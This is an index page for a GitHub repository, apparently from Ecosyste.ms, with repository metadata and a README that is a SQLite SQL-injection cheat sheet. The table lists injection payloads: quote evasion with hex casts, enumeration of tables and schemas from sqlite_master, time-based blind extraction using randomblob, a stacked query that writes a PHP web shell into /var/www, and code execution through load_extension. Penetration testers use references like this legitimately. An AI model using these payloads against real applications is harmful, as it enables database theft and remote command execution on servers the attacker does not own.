Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/unicornsasfuel/sqlite_sqli_cheat_sheet
A cheat sheet for attacking SQLite via SQLi
https://github.com/unicornsasfuel/sqlite_sqli_cheat_sheet
Last synced: 17 days ago
JSON representation
A cheat sheet for attacking SQLite via SQLi
- Host: GitHub
- URL: https://github.com/unicornsasfuel/sqlite_sqli_cheat_sheet
- Owner: unicornsasfuel
- Created: 2016-04-18T23:48:50.000Z (over 8 years ago)
- Default Branch: master
- Last Pushed: 2016-04-19T17:00:16.000Z (over 8 years ago)
- Last Synced: 2023-02-26T17:17:20.060Z (over 1 year ago)
- Size: 2.93 KB
- Stars: 80
- Watchers: 4
- Forks: 15
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# SQLite SQL Injection Cheat Sheet
|If you need | You use |
|-----------------------------|:-------------------------------------------------------------------------------:|
|Concatenation | \|\| |
|Comments | -- |
|Conditionals | CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse' |
|Substring | substr(string,start,stop) |
|Length | length(string) |
|Quotes without literal quotes| cast(X'27' as text) *--use X'22' for double quotes* |
|Table name enumeration | SELECT name FROM sqlite_master WHERE type='table' |
|Table schema enumeration | SELECT sql FROM sqlite_master WHERE type='table' |
|Time-based data extraction | cond='true' AND 1=randomblob(100000000) *--causes time delay if cond='true'* |
|File writing |1';ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘ system($_GET[‘cmd’]); ?>’;-- *--requires either direct database access or (non-default) stacked query option enabled*|
|Arbitrary Code Execution |load\_extension(library\_file,entry\_point) *-- .dll for Windows, .so for 'nix. Requires non-default configuration*|
This work is based on http://atta.cked.me/home/sqlite3injectioncheatsheet